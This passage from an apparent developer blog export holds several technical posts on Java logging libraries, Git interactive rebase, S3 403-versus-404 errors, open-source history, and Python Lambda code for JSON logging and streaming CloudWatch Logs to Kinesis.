<li> Don't implement your own logging facade. It's tempting, I know: you want to protect the people that haven't configured logging into their application. And it seems easy: two classes (a log factory and a logger), with some reflection to pick an appropriate back end. But there's a lot of room for error. If you get it wrong, you'll introduce subtle bugs and performance issues, and your experienced users will curse you (and look for an alternative library). And if you get it right, you'll find that you've re-implemented Commons Logging. And good or bad, it won't actually help inexperienced users: they should learn to use logging rather than deploy a black box and cross their fingers.
</ul>
<p> Bottom line: if you're writing an application, use whatever logging framework you want. I <a href="https://www.kdgregory.com/index.php?page=logging.log4j2Plugins#parting_thoughts" target="_blank">have a strong preference for SLF4J/Logback</a>, but Log4J 2.x does have some features that it's missing. However, if you're implementing a library, stick with Commons Logging. In almost every case it will Just Work™.
<br/><br/><hr/>
<p> <a name="footnote1">*</a>
Open Source Archaeology can be a fascinating experience. It's next to impossible to find a source-code repository that gives a full history for older projects: they typically started on CVS, then moved to SVN, and are now on GIT. In some cases, moving between hosting providers (although it looks like Hibernate is still actively maintained <a href="https://sourceforge.net/projects/hibernate/" target="_blank"> on SourceForge</a>, which makes me feel better about a couple of my older projects). Each move lost information such as version tags (assuming they ever existed).
<p> Maven Central is also less helpful than expected, because many projects changed their group or artifact IDs over their lifetime (plus, who wants to dig through 55 <em>pages</em> of <code>org.springframework</code> JAR listings). And a lot of older versions are “retconned”: they were imported into the repository long after release, with a made-up, minimal POM.
<p> Fortunately, most of the larger projects maintain their own archives, so you can download a particular version and unpack it to see what's there. And if you're looking for dependencies, you can pick a likely class and run <code>javap -c</code> to disassemble it and then look at variable declarations. It's a lot of work, and some might call it obsessive. But that's how I learned that Spring Framework 1.0 didn't log at all, while 1.2 used Commons Logging.
<p> <a name="footnote2">**</a>
They're also very vocal about it. I wrote an <a href="http://kdgregory.com/index.php?page=java.logging" target="_blank">article on logging techniques</a> in 2008 that referenced Commons Logging (because in my world it wasn't an issue), and constantly received comments telling me that it was horrible and should never be used. I eventually updated the article to reference SLF4J, primarily because it was focused at application logging, but also to keep the critics quiet.
kdgregoryhttp://www.blogger.com/profile/03491264911815834181noreply@blogger.com0tag:blogger.com,1999:blog-5210758134406178854.post-53183708426183447382020-04-09T07:46:00.001-04:002020-04-09T07:46:50.764-04:00Stupid Git Tricks: Interactive Rebase<p> I like to provide a nice, clean history in my pull requests. Reviewers should
be able to follow each commit, and see how the functionality is built up. No
extranneous commits. Nothing out of order. Everything looking like one smooth
path from idea to implementation.
<p> Unfortunately, my development process doesn't quite work that way. For one thing,
I commit (and push) frequently — as in every 10-15 minutes when I'm making lots
of changes. For another, I'll often realize that there's a small change that should
have been introduced several commits previously. For these, and other reasons, I
find <code>git rebase -i</code> invaluable.
<p> OK, some of you are probably outraged: “you're changing history!” Settle
down. This is for development branches, not master. And I'm willing to adapt in a team
setting: if my team members want to see messy commit histories in a pull request, I'm
OK with giving that to them. But only if they squash merges.
<p> So, here are a few of the ways that I change history. You're free to avoid them.
<h1> Combining commits </h1>
<p> Here's one morning's commit history:
<pre class="codeSample">
commit 6aefd6989ba7712cb047d661b68d34c888badea4 (HEAD -> dev-writing_log4j2, origin/dev-writing_log4j2)
Author: Me <me@example.com>
Date: Sun Apr 5 12:13:19 2020 -0400
checkpoint: content updates
...
commit e8503f01c72618709ac5231a78cfa8549fcfb7b3
Author: Me <me@example.com>
Date: Sun Apr 5 09:22:51 2020 -0400
checkpoint: content updates
commit 8bdb788421c56cb0defe73ce87b9e1ffe4266b0c
Author: Me <me@example.com>
Date: Sat Apr 4 13:57:27 2020 -0400
add reference to sample project
</pre>
<p> Three hours of changes, split up over eight commits, with regular pushes so I wouldn't
lose work if my SSD picked today to fail. I really don't want to see all of those in my
history.
<p> The solution is to squash those commits down using an interactive rebase:
<pre class="codeSample">
git rebase -i 8bdb788421c56cb0defe73ce87b9e1ffe4266b0c
</pre>
<p> When I run this, it starts my editor and shows me the following:
<pre class="codeSample">
pick e8503f0 checkpoint: content updates
pick f71ddca checkpoint: content updates
pick a8d7a25 checkpoint: content updates
pick 6b87b9b checkpoint: content updates
pick 556a346 checkpoint: content updates
pick 466dd26 checkpoint: content updates
pick 0034657 checkpoint: content updates
pick 6aefd69 checkpoint: content updates
# Rebase 8bdb788..6aefd69 onto 8bdb788 (8 commands)
#
# Commands:
# p, pick = use commit
# r, reword = use commit, but edit the commit message
# e, edit = use commit, but stop for amending
# s, squash = use commit, but meld into previous commit
# f, fixup = like "squash", but discard this commit's log message
# x, exec = run command (the rest of the line) using shell
# d, drop = remove commit
#
# These lines can be re-ordered; they are executed from top to bottom.
#
# If you remove a line here THAT COMMIT WILL BE LOST.
#
# However, if you remove everything, the rebase will be aborted.
#
# Note that empty commits are commented out
</pre>
<p> A list of commits, instructions on how to work with them, and a few warnings
about what happens if I do something dumb. To squash these commits I update
all but the first to be a “fixup”:
<pre class="codeSample">
pick e8503f0 checkpoint: content updates
f f71ddca checkpoint: content updates
f a8d7a25 checkpoint: content updates
f 6b87b9b checkpoint: content updates
f 556a346 checkpoint: content updates
f 466dd26 checkpoint: content updates
f 0034657 checkpoint: content updates
f 6aefd69 checkpoint: content updates
</pre>
<p> Save this and exit the editor, and Git applies all of those changes:
<pre class="codeSample">
Successfully rebased and updated refs/heads/dev-writing_log4j2.
</pre>
<p> And now when I look at my history, this is what I see:
<pre class="codeSample">
commit 51f5130422b524603d6249ef40e012aeecde5422 (HEAD -> dev-writing_log4j2)
Author: Me <me@example.com>
Date: Sun Apr 5 09:22:51 2020 -0400
checkpoint: content updates
commit 8bdb788421c56cb0defe73ce87b9e1ffe4266b0c
Author: Me <me@example.com>
Date: Sat Apr 4 13:57:27 2020 -0400
add reference to sample project
</pre>
<p> Note that the last commit hash has changed, and my working HEAD no longer
refers to the origin branch. This means that I'm going to need to force-push
these changes. But before that, there's one more thing that I want to do:
<pre class="codeSample">
git commit --amend -m "content updates" --reset-author
</pre>
<p> This command does two things. First, it updates my commit message: this is no
longer a “checkpoint” commit. The second thing it does is update
the basic commit info, in this case just the timestamp. If you looked closely
at the history above, you saw that all of the commits had been marked with the
timestamp of the first; <code>--reset-author</code> makes the history more closely
reflect what actually happened (it can also be used to pretend that other people
didn't contribute to the commit, but I'll assume you're more honorable than that).
<p> Now the log looks like this:
<pre class="codeSample">
commit fdef5d6f0a19218784b87a596322816347db2232 (HEAD -> dev-writing_log4j2)
Author: Me <me@example.com>
Date: Sun Apr 5 12:22:46 2020 -0400
content updates
commit 8bdb788421c56cb0defe73ce87b9e1ffe4266b0c
Author: Me <me@example.com>
Date: Sat Apr 4 13:57:27 2020 -0400
add reference to sample project
</pre>
<p> Which is what I want to see, so time to force-push and overwrite the previous
chain of commits:
<pre class="codeSample">
> git push -f
Counting objects: 4, done.
Delta compression using up to 4 threads.
Compressing objects: 100% (4/4), done.
Writing objects: 100% (4/4), 4.52 KiB | 2.26 MiB/s, done.
Total 4 (delta 3), reused 0 (delta 0)
To ssh://git-codecommit.us-east-1.amazonaws.com/v1/repos/Website
+ 6aefd69...fdef5d6 dev-writing_log4j2 -> dev-writing_log4j2 (forced update)
</pre>
<p> I should note here that the previous chain of commits still exists in your repository.
If, for some reason, you want to retrieve them, you can explicitly check-out the former
head commit:
<pre class="codeSample">
git checkout -b recovery 6aefd6989ba7712cb047d661b68d34c888badea4
</pre>
<p> Of course, if you close your terminal window, you might not find that commit hash
again, so if you're worried you should write it down it somewhere. When I'm making
a large set of changes, I'll often create a temporary branch from the one that's
being rebased, just in case (unfortunately, I often forget to switch back to the
branch that I want to rebase).
<h1> Re-ordering commits </h1>
<p> Especially at the start of a new project, I might jump around and edit several different
things, resulting in a messy commit history:
<pre class="codeSample">
pick fc46b5b update docs
pick 0f734fb minor change to feature X
pick 2233c01 update docs
pick fe56f59 another change to feature X
pick d3fb025 related change to feature Y
pick aec87c1 update docs
pick 66ef266 something unrelated to either X or Y
pick 96179b3 changing Y
pick 904a779 update docs
</pre>
<p> Interactive rebase allows you to move commits around, and then optionally squash those
moved commits:
<pre class="codeSample">
pick fc46b5b update docs
f 2233c01 update docs
f aec87c1 update docs
f 904a779 update docs
pick 0f734fb minor change to feature X
f fe56f59 another change to feature X
pick d3fb025 related change to feature Y
f 96179b3 changing Y
pick 66ef266 something unrelated to either X or Y
</pre>
<p> There are a couple of gotchas when you do this. First, you need to make sure that
you're not changing <em>both</em> X and Y in the same commit. If you do, you can
still squash the commits together, but it's pointless to try to track the work in
each feature separately.
<p> Second, make sure that you preserve order: in my example, commit <code>0f734fb</code>
happened before <code>fe56f59</code> the interactive rebase needs to keep them in
this order. If you don't, you can end up with merge conflicts that are challenging
to resolve.
<p> Lastly, and most important, <em>make sure you have the same number of commits that
you started with</em>. If you accidentally delete a commit rather than move it, you
will lose that work. For this reason, I tend to use interactive rebase on small pieces
of my history, perhaps making several passes over it.
<h1> Editing commits </h1>
<p> When writing my article about Log4J2 appenders, I saw a comment that I wanted to
change in the accompanying example code. Unfortunately, it wasn't the HEAD commit:
<pre class="codeSample">
commit 8007214ef232abf528baf2968162b51dcd2c09ca
Author: Me <me@example.com>
Date: Sat Apr 4 09:34:53 2020 -0400
README
commit 38c610db6a02747d7017dff0a9c2b7ed290e30e1
Author: Me <me@example.com>
Date: Sat Apr 4 08:34:12 2020 -0400
stage-10: add tests
commit 5dfd79e3f879038e915fa04c83f8eb9b0f695e35
Author: Me <me@example.com>
Date: Tue Mar 31 08:38:17 2020 -0400
stage-9: implement a lookup
</pre>
<p> There are two ways that I could have approached this. The first would be to create
a new commit and then reorder it and turn it into a fixup. The second is to edit
the file as part of an interactive rebase, by marking the commit with an "e":
<pre class="codeSample">
pick 5dfd79e stage-9: implement a lookup
e 38c610d stage-10: add tests
pick 8007214 README
</pre>
<p> When I do this, git works through the commits, and stops when it reaches the marked
one:
<pre class="codeSample">
Stopped at 38c610d... stage-10: add tests
You can amend the commit now, with
git commit --amend
Once you are satisfied with your changes, run
git rebase --continue
</pre>
<p> I can now edit any files in my working tree (they don't have to be part of the original
commit). Once I'm done, I do a <code>git add</code> for changed files, followed by
<em>both</em> <code>git commit --amend</code> and <code>git rebase --continue</code>.
After the rebase completes, I can force-push the changes.
<p> Beware that editing commits can introduce merge conflicts: if a later commit touches the
same code, you'll have to stop and resolve the conflict. This is more likely when you edit
early commits, or when the edits are wide-ranging. It is far less likely for changes
like comments.
<h1> Cherry-picking into the middle of a branch </h1>
<p> You may be familiar with <code>git cherry-pick</code>, which takes an arbitrary commit and
puts it at the HEAD of your current branch. This can be useful when two teams are working
on the same general area of the codebase: often one team will incidentally do something
that the other team finds valuable.
<p> Interactive rebase is like cherry-picking on steroids: you can insert a commit anywhere in
your commit tree. To be honest, I find this more risky than beneficial; instead I would
cherry-pick to HEAD and then perhaps use an interactive rebase to move the commit to where
it “belongs.” But in the interest of “stupid git tricks,” here we go.
<p> Let's say that you've been working on a branch and have been making changes, starting with
changes to the build scripts. Then you talk with a colleague, and learn that she has also
made changes to the build. You could cherry-pick her change to the end of your branch and
use it moving forward, but you're somewhat OCD and want to keep the build changes together.
So you fire up <code>git rebase -i</code> and add your colleague's commit as a new
“pick”:
<pre class="codeSample">
pick ffc954d build scripts
p 1438a13d11d6001de876a034f434a050c09b587d
pick b497403 update 1
pick 18e8415 update 2
pick 33a4e9d update 3
</pre>
<p> Now when you do a <code>git log</code>, you see something like this:
<pre class="codeSample">
... skipping two commits
commit 7b62acb8d9100f379a0d43e3227c36ae91c1edd9
Author: Me <me@example.com>
Date: Fri Mar 27 10:11:01 2020 -0400
update 1
commit c579ed88403354faed83213da63d4546c5aa13b5
Author: Someone Else <someone.else@example.com>
Date: Sun Jan 5 09:30:14 2020 -0500
some build changes
commit ffc954dc41555282ece3e2b7a0197472c0af9f11
Author: Me <me@example.com>
Date: Mon Jan 6 08:02:30 2020 -0500
build scripts
</pre>
<p> Note that the commit hash has changed: from <code>1438a13d</code> to
<code>c579ed88</code>. This is because it's now part of a new branch:
a commit hash is based not merely on the content of the commit, but
also the commit chain that it's a part of. However, the committer's
name and the commit date are unchanged.
<h1> Wrapping up: a plea for clean commit histories </h1>
<p> A standard Git merge, by preserving the chains of commits that led to the
merge point, is both incredibly useful and incredibly annoying. It's useful,
in that you can move along the original branch to understand the context of
a commit. It's annoying, in that your first view of the log shows the
commits intermingled and ordered by date, completely removing context.
<p> I find messy histories to be similar. Software development doesn't happen in
a clean, orderly fashion: developers often attach a problem from multiple
sides at once. And that can result in commit histories that jump around:
instead of “fix foo” you have “add test for bar”,
followed by “make test work”, followed by an endless string of
“no, really, this time everything works”.
<p> Maybe you find that informative. If not, do your future self (and your
coworkers) a favor and clean it up before making it part of the permanent
record.
kdgregoryhttp://www.blogger.com/profile/03491264911815834181noreply@blogger.com0tag:blogger.com,1999:blog-5210758134406178854.post-76506005531681008802020-03-30T07:25:00.001-04:002020-03-30T07:25:18.635-04:00S3 Troubleshooting: when 403 is really 404<p> It's generally a bad idea to click on links in strange websites, but <a href="https://com-kdgregory-static.s3.amazonaws.com/example" target="_blank">this one</a> is key to this post. If you were to click this link, you'd see a response like the following, and more importantly, the HTTP response code would be a 403 (Forbidden).
<pre class="codeSample">
<Error>
<Code>AccessDenied</Code>
<Message>Access Denied</Message>
<RequestId>CC60CD5C69BC271F</RequestId>
<HostId>gBmQHQNr/7CFHLCbiYjqzm3iT2m5WQCobTfxFiXIj9K0448YrtvJKbOimEXHwAxwILw0oDcS9TI=</HostId>
</Error>
</pre>
<p> However, that bucket is open to the world: AWS reminds me of this by flagging it as “Public” in bucket listings, and putting a little orange icon on the “Permissions” tab when I look at its properties. And if you click <a href="https://com-kdgregory-static.s3.amazonaws.com/example.txt" target="_blank">this similar link</a> you'll get a perfectly normal test file.
<p> The difference between the two links, of course, is that the former file doesn't exist in my bucket. But why isn't S3 giving me a 404 (Not Found) error? When I look at the <a href="https://docs.aws.amazon.com/AmazonS3/latest/API/ErrorResponses.html" target="_blank">list of S3 error responses</a> I see that there's a <code>NoSuchKey</code> response — indeed, it's the example at the head of that page.
<p> As it turns out, the reason for the 403 is called out in the <a href="https://docs.aws.amazon.com/AmazonS3/latest/API/API_GetObject.html" target="_blank">S3 GetObject</a> API documentation:
<ul>
<li> If you have the <code>s3:ListBucket</code> permission on the bucket, Amazon S3 will return an HTTP status code 404 ("no such key") error.
<li> If you don’t have the <code>s3:ListBucket</code> permission, Amazon S3 will return an HTTP status code 403 ("access denied") error.
</ul>
<p> While my bucket allows public read access to its objects via an access policy, that policy follows the principle of least privilege and only grants <code>s3:GetObject</code>. As do almost all of the IAM policies that I write for things like Lambdas.
<p> Which brings me to the reason for writing this post: Friday afternoon I was puzzling over an error with one of my Lambdas: I was creating dummy files to load-test an S3-triggered Lambda, and it was consistently failing with a 403 error. The files were in the source bucket, and the Lambda had <code>s3:GetObject</code> permission.
<p> I had to literally sleep on the error before realizing what happened. I was generating filenames using the Linux <code>date</code> command, which would produce output like <code>2020-03-27T15:43:31-04:00</code>. However, <a href="https://docs.aws.amazon.com/AmazonS3/latest/dev/notification-content-structure.html" target="_blank">S3 notifications url-encode the object key</a>, so the key in my events looked like this: <code>2020-03-27T15%3A43%3A31-04%3A00-c</code>. Which, when passed back to S3, didn't refer to any object in the bucket. But because my Lambda didn't have <code>s3:ListObjects</code> I was getting the 403 rather than a 404.
<p> So, to summarize the lessons from my experience:
<ol>
<li> Always url-decode the keys in an S3 notification event. How you do this depends on your language; for Python use the <code>unquote_plus()</code> function from the <a href="https://docs.python.org/3/library/urllib.parse.html#url-quoting" target="_blank">urllib.parse</a> module.
<li> If you see a 403 error, check your permissions first, but also look to see if the file you're trying to retrieve actually exists.
</ol>
<p> You'll note that I didn't say “grant <code>s3:ListObjects</code> in your IAM policies.” The principle of least privilege still applies.
kdgregoryhttp://www.blogger.com/profile/03491264911815834181noreply@blogger.com0tag:blogger.com,1999:blog-5210758134406178854.post-42957212298589492012020-01-06T08:00:00.002-05:002020-01-06T08:00:28.237-05:00The Future of Open Source<p> The world of open source software seems to be going through a period of soul-searching. On the one hand, individual maintainers have retracted packages, causing disruption for the communities that depended on those packages. On the other, software-as-a-service providers are making more money from some applications than their creators.
<p> This is all happening in a world where businesses depend on open-source to operate. It doesn't matter whether you're an individual launching a startup with PHP and MySQL, or a multi-national replacing your mainframe with a fleet of Linux boxes running Java. Your business depends on the work of people that have their own motivations, and those motivations may not align with yours. I think this is an untenable situation, one that will eventually resolve by changing the nature of open-source.
<p> Before looking at how I think it will resolve, I want to give some historical perspective. This is one person's view; you may not agree with it.
<p> I date the beginning of “professional” open source as March 1985: that was the month that <a href="https://archive.org/details/dr_dobbs_journal_vol_10" target="_blank">Dr Dobbs published an article by Richard Stallman</a>, an article that would turn into the <a href="https://www.gnu.org/gnu/manifesto.en.html" target="_blank">GNU Manifesto</a>. There was plenty of freely available software published prior to that time; my experience was with the Digital Equipment Corporation User Society (DECUS), which published <a href="https://archive.org/details/bitsavers_decdecuspratalogPDP11Aug78_8403699" target="_blank">an annual catalog</a> of programs ranging in complexity from fast fourier transform routines to complete language implementations. These came with source code and no copyright attached (or, at least, no <em>registered</em> copyright, which was an important distinction in the 1970s and early 1980s).
<p> What was different about the GNU Manifesto, and why I refer to it as the start of “professional” open source, was that Stallman set out a vision of how programmers could make money when they gave away their software. In his view, companies would get software for free but then hire programmers to maintain and enhance it.
<p> In 1989, Stallman backed up the ideas of the GNU Manifesto with the <a href="https://www.gnu.org/licenses/old-licenses/gpl-1.0.html" target="_blank">Gnu Public License</a> (GPL), which was applied to the software produced by the GNU project. This licence introduced the idea of “copyleft”: a requirement that any “derivative works” also be licensed using the GPL, meaning that software developers could not restrict access to their code. Even though that requirement was relaxed in 1991 with the “library” (now “lesser”) license, meaning that you could use the GNU C compiler to compile your programs without them becoming open source by that act, the GPL scared most corporations away from any use of the GNU tools (as late as 1999, I was met with a look of shock when I suggested that the GNU C compiler could make our multi-platform application easier to manage).
<p> In my opinion, it was the Apache web server, introduced in 1995, that made open-source palatable (or at least acceptable) to the corporate world. In large part, this was due to the Apache license, which essentially said “do what you want, but don't blame us if anything goes wrong.” But also, I think it was because the corporate world was completely unprepared for the web. To give a sense of how quickly things moved: in 1989 I helped set up the DNS infrastructure for a major division of one of the world's largest corporations; I had only a few years of experience with TCP/IP networking, but it was more than the IT team. NCSA Mosaic appeared four years later, and within a year or two after that companies were scrambling to create a web presence. Much like the introduction of PCs ten years earlier, this happened outside of corporate IT; while there were commercial web-servers (including Microsoft and Netscape), “free as in beer” was a strong incentive.
<p> Linux, of course, was a thing in the late 1990s, but in my experience wasn't used outside of a hobbyist community; corporations that wanted UNIX used a commercial distribution. In my view, Linux became popular due to two things: first, Eric Raymond published <a href="http://www.catb.org/~esr/writings/cathedral-bazaar/cathedral-bazaar/" target="_blank">The Cathedral and the Bazaar</a> in 1997, which made the case that open source was actually better than commercial systems: it has to be good to survive. But also, after the dot-com crash, “free as in beer” became a selling point, especially to the startups that would create “Web 2.0”
<p> Jumping forward 20 years, open-source software is firmly embedded in the corporate world. While I'm an oddity for running Linux on the desktop, all of the companies I've worked with in the last ten or more years used it for their production deployments. And not just Linux; the most popular database systems are open source, as are the tools to provision and manage servers, and even productivity tools such as LibreOffice. And for most of the users of these tools, “free as in beer” is an important consideration.
<p> But stability is (or should be) another important consideration, and I think that many open-source consumers have been lulled into a false sense of stability. The large projects, such as GNU and Apache, have their own repositories and aren't going anywhere. And the early “public” repositories, such as SourceForge and Maven Central, adopted a policy that “once you publish something here, it will never go away.” But newer repositories don't have such a policy, and as we saw with <code>left-pad</code> in 2016 and <code>chef-sugar</code> in 2019, authors are willing and able to pull their work down.
<p> At the same time, companies such as Mongo and Elastic.NV found that releasing their core products as open-source might not have been such a great idea. Software-as-a-service companies such as AWS are able to take those products and host them as a paid service, often making more money from the hosting than the original companies do from the services they offer around the product. And in response, the product companies have changed the license on their software, attempting to cut off that usage (or at least capture a share of it).
<p> Looking at both behaviors, I can't help but think that one of the core tenets of the GNU manifesto has been forgotten: that the developers of open-source software do not have the right to control its use. Indeed, the Manifesto is quite clear on this point: “[programmers] deserve to be punished if they restrict the use of these programs.”
<p> You may or may not agree with that idea. I personally believe that creators have the right to decide how their work is used. But I also believe that releasing your work under an open-source license is a commitment, one that can't be retracted.
<p> Regardless of any philosophical view on the matter, I think there are two practical outcomes.
<p> The first is that companies — or development teams — that depend on open-source software need to ensure their continued access to that software. Nearly eight years ago <a href="https://blog.kdgregory.com/2012/08/taming-maven-local-repository-server.html" target="_blank">I wrote about using a local repository server</a> when working with Maven and Java. At the time I was focused on coordination between different development teams at the same company. If I were to rewrite the post today, it would focus on using the local server to ensure that you always have access to your dependencies.
<p> A second, and less happy change, is that I think open-source creators will lose the ability to control their work. One way this will happen is for companies whose products are dependent on open-source to provide their own public repositories — indeed, I'm rather amazed that <a href="https://www.chef.io/products/" target="_blank">Chef</a> doesn't offer such a repository (although perhaps they're gun-shy after the reaction to their hamfisted attempt to redistributed <em>chef-sugar</em>).
<p> The other way this will happen is for service-provider companies to fork open-source projects and maintain their own versions. Amazon has already done this, for Elasticsearch and also OpenJDK; I don't expect them to be the only company to do so. While these actions may damage the companies' reputations within a small community of open-source enthusiasts, the much larger community of their clients will applaud those actions. I can't imagine there are many development teams that will say “we're going to self-host Elasticsearch as an act of solidarity”; convenience will always win out.
<p> If you're like me, a person responsible for a few niche open-source projects, this probably won't matter: nobody's going to care about your library (although note that both <code>left-pad</code> and <code>chef-sugar</code> at least started out single-maintainer niche projects). But if you're a company that is planning to release your core product as open-source, you should think long and hard about why you want to do this, and whether your plan to make money is viable. And remember these words from the GNU Manifesto: “programming will not be as lucrative on the new basis as it is now.”
kdgregoryhttp://www.blogger.com/profile/03491264911815834181noreply@blogger.com0tag:blogger.com,1999:blog-5210758134406178854.post-34260440730929010272019-10-08T07:03:00.003-04:002019-10-08T07:03:47.018-04:00Writing JSON Logs from a Python Lambda<p> My <a href="http://blog.kdgregory.com/2019/09/streaming-cloudwatch-logs-to_12.html" target="_blank">previous post</a> looked at a Lambda function that would accept log messages from one Kinesis stream, transform them into JSON, and write them to another Kinesis stream, from which they would be inserted into an Elasticsearch cluster. In that post I skipped over the actual transformation code, other than saying that it would pass existing JSON objects unchanged, and recognize the <a href="https://docs.aws.amazon.com/lambda/latest/dg/python-logging.html" target="_blank">Lambda Python log format</a>.
<p> However, I'd prefer not to perform this translation: I want to write log messages <a href="https://www.kdgregory.com/index.php?page=aws.loggingPipeline#application" target="_blank">as JSON</a>, which will allow me to easily add additional information to the message and use searches based on specific details. With the <a href="https://docs.python.org/3/library/logging.html" target="_blank">Python logging facility</a>, it's <a href="https://gist.github.com/kdgregory/82cc3942311c1983a9e141a8ced1f5fd" target="_blank">easy to make this happen</a>.
<p> Unless you're running on Lambda.
<p> The linked example assumes that you can configure logging at the start of your main module. However, Lambda configures logging for you, before your code gets loaded. If you print <code>logging.root.handlers</code>, from a Lambda, you'll see that there's already a <code>LambdaLoggerHandler</code> installed. To use my formatter, you need to update this handler:
<pre class="codeSample">
for handler in root.handlers:
handler.setFormatter(JSONFormatter())
</pre>
<p> While I could have replaced this handler entirely, with one that wrote to StdErr, I was concerned that it performed some undocumented magic. One thing that I did discover, although it doesn't quite count as magic, is that it inserts the Lambda's request ID in the <code>LogRecord</code> before passing it to the formatter.
<p> By not using that piece of information, I require that the formatter be initialized for every Lambda invocation, so that it can get the request ID out of the invocation context. This also allows me to pull out the Lambda name and version, or any of the other <a href="https://docs.aws.amazon.com/lambda/latest/dg/python-context-object.html" target="_blank">documented context attributes</a>.
<p> If you also want JSON-formatted logs from your Lambdas, I've included a documented example <a href="https://github.com/kdgregory/aws-misc/tree/master/lambda/json-logging" target="_blank">here</a>.
kdgregoryhttp://www.blogger.com/profile/03491264911815834181noreply@blogger.com0tag:blogger.com,1999:blog-5210758134406178854.post-10429500792195694542019-09-12T07:21:00.001-04:002019-09-12T07:21:59.785-04:00Streaming CloudWatch logs to Elasticsearch, Part 2: Teh Codez<p> My last post described my different attempts at incorporating CloudWatch Logs events into an Elasticsearch-based logging pipeline. This post looks at the actual code. To avoid boring you, it just touches on the main points; if you want the whole thing go <a href="https://github.com/kdgregory/aws-misc/tree/master/lambda/cloudwatch-log-transform" target="_blank">here</a>.
<h1> Creating the subscription </h1>
<p> The first step in streaming your CloudWatch Logs is to create a subscription. As I mentioned in my last post, you can't do this via the AWS Console. The <a href="https://docs.aws.amazon.com/AmazonCloudWatch/latest/logs/SubscriptionFilters.html#DestinationKinesisExample" target="_blank">Amazon documentation</a> walks you through creating the subscription via the CLI, or you can use the CloudFormation template from my project.
<p> One important note: the stream has to be active before you can create a subscription; if you create the stream and then immediately try to create the subscription, it will fail. This is why I have a separate templates to create the stream and subscribe to it (it's also easier to replicate the subscription when it's a separate template).
<p> The messages are written to the stream as JSON. Each message identifies the log group and stream, and contains a list of log events:
<pre class="codeSample">
{
"messageType": "DATA_MESSAGE",
"owner": "012345678901",
"logGroup": "AppenderExample",
"logStream": "Example-20190825",
"subscriptionFilters": ["CloudWatchSubscription-Subscription-184MSZXRD5MCP"],
"logEvents": [{
"id": "34939504216003552676187468284442890586332374987778818048",
"timestamp": 1566741555269,
"message": "some message\n"
}, {
"id": "34939504216092755656981590777009033459422968433802739713",
"timestamp": 1566741555273,
"message": "another message\n"
}, {
"id": "34939504239575440351034336945046144800521693099600117762",
"timestamp": 1566741556326,
"message": "still another\n"
}]
}
</pre>
<h1> Processing the input messages </h1>
<p> When Kinesis invokes a Lambda, it packages multiple records into a single invocation event, with the original message GZipped and Base64-encoded:
<pre class="codeSample">
{
"Records": [
{
"kinesis": {
"kinesisSchemaVersion": "1.0",
"partitionKey": "ea05911b7285b29393412d960053f81d",
"sequenceNumber": "49598889268738564796327312231530438478076180289718059010",
"data": "H4sIANoVbV0AA42QW2vCQBCFn5NfIfusMLs7e5m+BbU+CaURWtpKSXXRQExCsvaC+N+7sSn0QqUvC7PnMOebc4gjtnNtm23c4q127GLAJskieZxP0zSZTdkw6NVL6ZpOAS4kKm0sAT8pRbWZNdW+7sSkrl25ds30NdvVhfvUU9+4bNcZemEkgBNYoU6Odv/Urpq89nlVXuaFd00bvPdsXFT79U3mV9v0i2P0beAW5+nd7fVEzcdXbNkHTp9d6U9LDnEUsXzdZUskSQpQcA0glRLaaG4NaissIopwkbJaSiENkjXGWMstoO0YI+bzUJEP9GEVV1ob5KrbQSe1r6+LaaudG/TzQ8ni6Dgc/EFBwiillSbLFUFIBCCQoV5CIUhblNKCMJIMl2cpjPxJkZWV37rmPyDhNQoxVMJBhkhNGL41R7QAKnCSBKLQGefGaHEGREuhf9Xh86IY9DgfGMv4GL8DWgIaCnQCAAA=",
"approximateArrivalTimestamp": 1566741561.188
},
"eventSource": "aws:kinesis",
"eventVersion": "1.0",
"eventID": "shardId-000000000000:49598889268738564796327312231530438478076180289718059010",
"eventName": "aws:kinesis:record",
"invokeIdentityArn": "arn:aws:iam::012345678901:role/DefaultLambdaProfile",
"awsRegion": "us-east-1",
"eventSourceARN": "arn:aws:kinesis:us-east-1:012345678901:stream/CloudWatchSubscriptionDestination"
},
...
]
}
</pre>
<p> To transform the input events, you need to iterate over each of the top-level records, extract its payload, and then iterate over each of the child events to transform them. In order to simplify the output code, my <code>process_input_record()</code> function returns just the transformed child events, so that the output code can work on a “flattened” array.
<pre class="codeSample">
def lambda_handler(event, context):
outputMessages = []
for record in event['Records']:
outputMessages = outputMessages + process_input_record(record)
logging.info(f'total number of messages to output: {len(outputMessages)}')
logging.debug(f'output messages: {json.dumps(outputMessages)}')
write_to_kinesis(outputMessages)
def process_input_record(record):
try:
payload = record['kinesis']['data']
decoded = gzip.decompress(base64.b64decode(payload))
data = json.loads(decoded)
message_type = data.get('messageType')
if message_type == 'DATA_MESSAGE':
logGroup = data['logGroup']
logStream = data['logStream']
events = data.get('logEvents', [])
logging.info(f'processing {len(events)} events from group "{logGroup}" / stream "{logStream}"')
logging.debug(f'input messages: {json.dumps(events)}')
return [transform_log_event(logGroup, logStream, event) for event in events]
elif message_type == 'CONTROL_MESSAGE':
logging.info('skipping control message')
elif message_type:
logging.warn(f'unexpected message type: {message_type}')
except:
logging.error(f'failed to process record; keys = {record.keys()}', exc_info=True)
# fall-through for any unprocessed messages (exception or unhandled message type)
return []
</pre>
<p> One thing to note about <code>process_input_record()</code> is the <code>if</code> statement at its core. CloudWatch Logs writes two different types of messages: most of the messages are data messages, which contain log events. However, when you first subscribe the log group to a stream, it writes a control message to verify that it has permission to do so. There shouldn't be any other message types, but if AWS adds one we'll ignore it. I also wrap the entire function in a try block, in case something other than a valid Logs message ends up on the stream.
<p> Each event in the record gets passed through <code>transform_log_event()</code>, not shown here, which performs the following transformations:
<ul>
<li> If the message isn't already JSON, it's transformed into JSON with a `timestamp`, `message`, and `level` fields. This makes the message compatible with those written by my logging adapter.
<li> If the message looks like a Lambda status message, it's parsed, and relevant data (eg, request ID, execution duration, and memory used) is extracted and stored in a child object.
<li> If the message looks like <a href="https://docs.aws.amazon.com/lambda/latest/dg/python-logging.html" target="_blank">Lambda logging output</a>, it is parsed and the components (level, timestamp, request ID, and message) are stored in separate fields. <em>Note:</em> my transform only supports Python log output; the Node.JS runtime outputs fields in a different order.
<li> The source log group and stream are added, as a sub-object.
</ul>
<p> If you want to add your own transformations — such as support for Node.JS logs — this is the place to do it.
<h1> Writing messages to Kinesis </h1>
<p> As I've written elsewhere, writing to Kinesis is easy to do, but difficult to do right:
<ul>
<li> For performance, you should use the <code>PutRecords</code> API rather than <code>PutRecord</code>.
<li> Which means that you must create batches of records that fit into the limits of this API (1 MB or 500 messages).
<li> You have to be prepared for your entire call to be throttled, and resend after a delay.
<li> And you have to be prepared for individual records within the batch to be throttled due to load on the destination shard, and resend just them.
</ul>
